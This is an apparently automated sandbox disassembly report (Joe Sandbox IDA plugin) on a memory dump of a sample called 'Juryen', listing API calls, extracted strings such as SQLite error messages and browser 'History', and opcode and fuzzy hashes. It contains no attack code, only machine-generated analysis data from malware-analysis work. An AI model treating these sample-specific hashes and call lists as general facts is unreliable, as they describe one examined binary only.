                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                      • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                      • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                      • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                    • API String ID: 2618321458-3614832568
                                                                    • Opcode ID: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                    • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                    • Opcode Fuzzy Hash: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                    • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFilefreememset
                                                                    • String ID:
                                                                    • API String ID: 2507021081-0
                                                                    • Opcode ID: 7cf80b7bcafbae618536fb4bc093b34167423ba0ffe002ce62182f5d73f8b864
                                                                    • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                    • Opcode Fuzzy Hash: 7cf80b7bcafbae618536fb4bc093b34167423ba0ffe002ce62182f5d73f8b864
                                                                    • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                    APIs
                                                                    • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                    • malloc.MSVCRT ref: 00417524
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                    • free.MSVCRT ref: 00417544
                                                                    • free.MSVCRT ref: 00417562
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                    • String ID:
                                                                    • API String ID: 4131324427-0
                                                                    • Opcode ID: 0b5abdb1f50a43c92236d4af65df84c42422b68fc3826eb4b9ca135c63c32c08
                                                                    • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                    • Opcode Fuzzy Hash: 0b5abdb1f50a43c92236d4af65df84c42422b68fc3826eb4b9ca135c63c32c08
                                                                    • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                    APIs
                                                                    • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                    • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                    • free.MSVCRT ref: 0041822B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: PathTemp$free
                                                                    • String ID: %s\etilqs_$etilqs_
                                                                    • API String ID: 924794160-1420421710
                                                                    • Opcode ID: c9d5b5596c1dde7ff1a933dde4a77cb6db406228a744c63c7018c69b2ff3a246
                                                                    • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                    • Opcode Fuzzy Hash: c9d5b5596c1dde7ff1a933dde4a77cb6db406228a744c63c7018c69b2ff3a246
                                                                    • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040FDD5
                                                                      • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,<,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                    • _snwprintf.MSVCRT ref: 0040FE1F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                    • String ID: <%s>%s</%s>$</item>$<item>
                                                                    • API String ID: 1775345501-2769808009
                                                                    • Opcode ID: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                    • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                    • Opcode Fuzzy Hash: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                    • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                    APIs
                                                                    • wcscpy.MSVCRT ref: 0041477F
                                                                    • wcscpy.MSVCRT ref: 0041479A
                                                                    • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General,?,00000000,00000001), ref: 004147C1
                                                                    • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: wcscpy$CloseCreateFileHandle
                                                                    • String ID: General
                                                                    • API String ID: 999786162-26480598
                                                                    • Opcode ID: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                    • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                    • Opcode Fuzzy Hash: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                    • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                    • _snwprintf.MSVCRT ref: 0040977D
                                                                    • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastMessage_snwprintf
                                                                    • String ID: Error$Error %d: %s
                                                                    • API String ID: 313946961-1552265934
                                                                    • Opcode ID: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                    • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                    • Opcode Fuzzy Hash: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                    • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: foreign key constraint failed$new$oid$old
                                                                    • API String ID: 0-1953309616
                                                                    • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                    • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                    • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                    • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                    APIs
                                                                    Strings
                                                                    • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                    • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                    • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                    • API String ID: 3510742995-272990098
                                                                    • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                    • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                    • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                    • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0044A6EB
                                                                    • memset.MSVCRT ref: 0044A6FB
                                                                    • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                    • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcpymemset
                                                                    • String ID: gj
                                                                    • API String ID: 1297977491-4203073231
                                                                    • Opcode ID: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                    • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                    • Opcode Fuzzy Hash: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                    • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                    APIs
                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E961
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E974
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E987
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E99A
                                                                    • free.MSVCRT ref: 0040E9D3
                                                                      • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                    Similarity
                                                                    • API ID: ??3@$free
                                                                    • String ID:
                                                                    • API String ID: 2241099983-0
                                                                    • Opcode ID: 5bf7d1a6be3c7450b3871e5cd35d64ffe6244b7c5c0165dc5567eb6e33e5d2a7
                                                                    • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                    • Opcode Fuzzy Hash: 5bf7d1a6be3c7450b3871e5cd35d64ffe6244b7c5c0165dc5567eb6e33e5d2a7
                                                                    • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                    APIs
                                                                    • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                    • malloc.MSVCRT ref: 004174BD
                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                    • free.MSVCRT ref: 004174E4
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                    • String ID:
                                                                    • API String ID: 4053608372-0
                                                                    • Opcode ID: b0e2352a19f761283a872d87c69d2b5bb205fab1a5e12f8af4558502f69ded4d
                                                                    • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                    • Opcode Fuzzy Hash: b0e2352a19f761283a872d87c69d2b5bb205fab1a5e12f8af4558502f69ded4d
                                                                    • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                    APIs
                                                                    • GetParent.USER32(?), ref: 0040D453
                                                                    • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                    • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                    Similarity
                                                                    • API ID: Window$Rect$ClientParentPoints
                                                                    • String ID:
                                                                    • API String ID: 4247780290-0
                                                                    • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                    • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                    • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                    • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                    APIs
                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                    • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                    • memset.MSVCRT ref: 004450CD
                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                      • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                    Similarity
                                                                    • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                    • String ID:
                                                                    • API String ID: 1471605966-0
                                                                    • Opcode ID: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                    • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                    • Opcode Fuzzy Hash: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                    • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                    APIs
                                                                    • wcscpy.MSVCRT ref: 0044475F
                                                                    • wcscat.MSVCRT ref: 0044476E
                                                                    • wcscat.MSVCRT ref: 0044477F
                                                                    • wcscat.MSVCRT ref: 0044478E
                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                      • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                      • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                    • String ID: \StringFileInfo\
                                                                    • API String ID: 102104167-2245444037
                                                                    • Opcode ID: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                    • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                    • Opcode Fuzzy Hash: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                    • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID:
                                                                    • API String ID: 613200358-0
                                                                    • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                    • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                    • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                    • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                    APIs
                                                                    • GetSystemMetrics.USER32(00000000), ref: 00401990
                                                                    • GetSystemMetrics.USER32(00000001), ref: 0040199B
                                                                    • SetWindowPlacement.USER32(00000000,?), ref: 004019CC
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: MetricsSystem$PlacementWindow
                                                                    • String ID: AE
                                                                    • API String ID: 3548547718-685266089
                                                                    • Opcode ID: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                    • Instruction ID: bc47655bc3d2af3ddac3cbb2ac08b89d1fd66a09df9f10e9f6ff2044f470f5ca
                                                                    • Opcode Fuzzy Hash: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                    • Instruction Fuzzy Hash: 4C11AC719002099BCF20CF5EC8987EE77B5BF41308F15017ADC90BB292D670A841CB64
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: _memicmpwcslen
                                                                    • String ID: @@@@$History
                                                                    • API String ID: 1872909662-685208920
                                                                    • Opcode ID: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                    • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                    • Opcode Fuzzy Hash: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                    • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004100FB
                                                                    • memset.MSVCRT ref: 00410112
                                                                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                    • _snwprintf.MSVCRT ref: 00410141
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                    • String ID: </%s>
                                                                    • API String ID: 3400436232-259020660
                                                                    • Opcode ID: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                    • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                    • Opcode Fuzzy Hash: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                    • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040E770
                                                                    • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: MessageSendmemset
                                                                    • String ID: AE$"
                                                                    • API String ID: 568519121-1989281832
                                                                    • Opcode ID: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                    • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                    • Opcode Fuzzy Hash: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                    • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040D58D
                                                                    • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                    • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: ChildEnumTextWindowWindowsmemset
                                                                    • String ID: caption
                                                                    • API String ID: 1523050162-4135340389
                                                                    • Opcode ID: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                    • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                    • Opcode Fuzzy Hash: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                    • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
APIs
  • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
  • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
• CreateFontIndirectW.GDI32(?), ref: 00401156
